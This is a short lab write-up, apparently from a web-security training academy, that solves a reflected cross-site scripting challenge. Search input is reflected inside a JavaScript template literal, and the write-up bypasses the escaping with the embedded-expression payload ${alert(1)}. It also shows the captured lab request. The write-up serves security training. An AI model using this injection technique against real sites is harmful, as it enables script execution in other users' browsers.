Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode escaped
Description
This lab contains a reflected cross-site scripting vulnerability in the search blog functionality. The reflection occurs inside a template string with angle brackets, single, and double quotes HTML encoded, and backticks escaped. To solve this lab, perform a cross-site scripting attack that calls the alert function inside the template string.
Approach
After accessing the lab, I sent the search request to Burp Suite for further analysis:
GET /?search=ichyaboy HTTP/2
Host: 0a5d006804e572dc89d1291800d50087.web-security-academy.net
Cookie: session=JBrXfsGM2SwopYB2mJruqnkxuP67NWbP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...
In the response, I noticed that my input data is being passed to a script:
<script>
var message = `0 search results for 'ichyaboy'`;
document.getElementById('searchMessage').innerText = message;
</script>
Since angle brackets, single quotes, double quotes, backslashes, and backticks are Unicode-escaped, there is no way to close the template literal or the surrounding script tag. The characters $, { and } are left untouched, however, so I used an embedded expression ${...}, which the browser evaluates as JavaScript when it processes the template literal.
By injecting the following payload:
${alert(1)}
I triggered an alert popup, successfully solving the lab.